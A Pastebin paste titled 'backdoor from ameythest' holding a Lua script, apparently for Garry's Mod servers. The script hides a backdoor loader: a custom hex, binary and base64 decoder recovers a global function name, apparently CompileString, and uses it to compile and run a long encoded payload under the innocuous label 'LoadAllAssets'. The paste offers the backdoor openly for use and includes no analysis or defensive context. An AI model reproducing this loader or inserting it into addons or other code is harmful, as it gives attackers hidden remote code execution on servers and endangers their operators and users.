hoobonceagain

backdoor from ameythest

Sep 20th, 2018
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.49 KB | None | 0 0
  1. timer.Simple( 5, function() AddCSLuaFile("") print("Loading") local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' function z(data) data = data:gsub('..', function (cc) return string.char(tonumber(cc, 16)) end) local s = table.concat(string.Explode(" ", data)) local bin = s local r = {} for i=1,#bin,8 do local n = 0 for j=0,7 do n = n + (2^(7-j)) * bin[i+j] end r[#r+1] = n end data = string.char(unpack(r)) string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.' , function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end f = _G[z('3031303130303031203030313130303130203030313131303031203031313130313030203031313030303131203031303030313131203031313031313030203031313130303131203031303131303130203031303130313130203031303031313130203030313130303030203031313030303131203031313031313031203031313031313030203031313130313031203031303131303130203031313130313131203030313131313031203030313131313031')] g = z("3031303130303131203031303030313130203031303130303130203031303130313031203031303130313031203031303030303131203031313031303030203030313130313131203031313030313030203031303131303030203031303031303130203031313130303131203031303031303031203031303030313030203030313130303030203031313030313131203031303031303031203031313031313031203031313031303030203030313130303030203031313030313030203031303031303030203031303030303130203031313131303130203031303031313131203031313031303031203030313131303030203031313130313130203031313030303130203030313130303130203031313030313030203031313130303131203031313030303130203031313031313031203031303130313130203030313130303030203031313030313030203030313130303130203030313131303031203031313131303031203031313030303031203031313131303031203030313130313031203030313130303030203031313030303031203031313131303031203030313131303031203031313130303131203031313030303130203030313130303130203031303030313130203031313031303131203031303031313030203031313031313031203031313131303030203030313130303031203031303131303031203031303130303131203031303031303031203031313130303131203031303031303031203031303031303030203031303031313130203030313130303031203031303131303031203030313130303130203031303031313130203031313031313030203031313030303131203030313130303131203031303031313031203031313030313131203031303130303030203031303130303131203031303030303130203031313031313031203031313030313030203031303130313131203030313130313031203031313031303130203031313030313030203031303030313131203031313031313030203031313130313130203031313030303130203031313031303031203031313031303030203031313030313130203031303031313030203031303030303131203031303030303130203031313031303130203031313030303130203030313130303130203031303130303130203031313031313030203031303031303131203031303130303131203031303030303130203031303130303131203031313030313030203031303130313131203030313130313031203031303130313030203031313030313030203031303031303030203031303031303130203031313130303030203031313030303130203031313031313031203031313030303131203031313031313131203031303131303031203030313130303130203030313131303031203031313031303131203031303131303130203031303130303131203031313031303131203031313030313131203031303131303130203031303130313131203030313130313031203031313031303131203031313030313130203031303130303131203031313031303131203030313131313031") local assests = f(g, "LoadAllAssets", false) assests() end )
  2. print("Loaded")
Advertisement
Add Comment
Please, Sign In to add comment